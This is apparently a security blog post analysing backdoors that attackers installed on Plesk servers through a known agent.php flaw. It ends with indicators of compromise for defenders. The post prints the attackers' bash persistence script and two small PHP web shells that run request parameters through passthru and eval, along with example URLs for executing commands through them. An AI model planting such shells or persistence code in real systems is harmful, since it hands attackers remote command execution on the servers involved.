Blog

Plesk backdoors, a very large number of servers compromised.

In another post ( http://0entropy.blogspot.com/2012_03_01_archive.html ) we wrote about some perl scripts, bots, that were found in PLESK server installations. Apparently there is more on it. As described also in parallels forums, http://forum.parallels.com/showthread.php?t=258101 the attacks were quite elaborated. Attackers, using the bug http://kb.parallels.com/en/112303 were able to get access to PLESK installations and install backdoors in the systems. I’m using plural on backdoors, cause it’s not just one, there are quite a few.

In some systems /dev/shm/persist was created with the following code:

# cat /dev/shm/persist
#!/bin/bash
export PATHS=”/opt/psa/bin /opt/psa/admin/bin /usr/local/psa/admin/bin /usr/local/psa/bin”
export MYSUDO=”"
for n in $PATHS; do export MYSUDO=”$MYSUDO $(ls $n/sw-engine-psa $n/sw-engine-plesk 2>/dev/null)”;done
for n in $MYSUDO; do test -u $n && export MYSUDO=$n;done
export PSAD=”"
for n in $PATHS; do export PSAD=”$PSAD $(ls $n/psadmd $n/psadmind 2>/dev/null)”;done
for PSADMD in $PSAD;do $MYSUDO “sed -i \”/daemon_name=sw-cp-serverd/a $PSADMD 2> \/dev\/null;\” /etc/init.d/psa”;$MYSUDO $PSADMD;done
$MYSUDO ‘mv /opt/psa/admin/htdocs/enterprise/control/agent.php /opt/psa/admin/htdocs/enterprise/control/old.php’
$MYSUDO ‘mv /usr/local/psa/admin/htdocs/enterprise/control/agent.php /usr/local/psa/admin/htdocs/enterprise/control/old.php’

In some cases, this file was hex encoded, in others in plain text form.

Attackers in this way manage to keep in the system the vulnerable, by default, version of ‘agent.php’ . More on that they installed a backdoor under the name engine.php in the path /usr/local/psa/admin/htdocs/enterprise/control/psa.

Prior to this attack, another attack was performed with less modifications in the systems. During the last days of August 2011, attackers used the same vulnerable version of ‘agent.php’ to upload a file with the name ctrl.php3 under the path /usr/local/psa/admin/htdocs/enterprise/control. The file, ctrl.php3 included the following:

<?
if (isset($_REQUEST['x']))
{       passthru($_REQUEST['x']);
}
?>

A simple web request in the form http://domain:8443/enterprise/control/ctrl.php3?x=command , will execute the command on the system.

I assume the first attack went unnoticed from many and the scale of it was much smaller than the second. The second attack, again using the ‘agent.php’ as described above, left the file engine.php together with other files in the systems. The file engine.php is very similar to the ctrl.php3 file, specifically engine.php is the following:

<?
if (isset($_REQUEST['x']))
{ eval($_REQUEST['x']);
}
if (isset($_REQUEST['z']))
{ passthru($_REQUEST['z']);
}
?>

Command execution can be performed now in two ways, one way is using javascript code under the variable x, and direct command execution under the variable z.  An attack on the systems directly could be performed with the following url:

http://domain:8443/enterprise/control/psa/engine.php?z=command

Other files that were created under the second attack:

/opt/psa/admin/bin/psadmd
/opt/psa/admin/bin/psactl

both files were setuid root, psadmd is a backdoor that will run in the system at port 32399 and psactl is just a suid root shell.

Check your PLESK servers for the existence of the above files and if port 32399 is open.

 

Facebook Twitter Linkedin Digg Stumbleupon Email
0

Υποβολή Σχολίου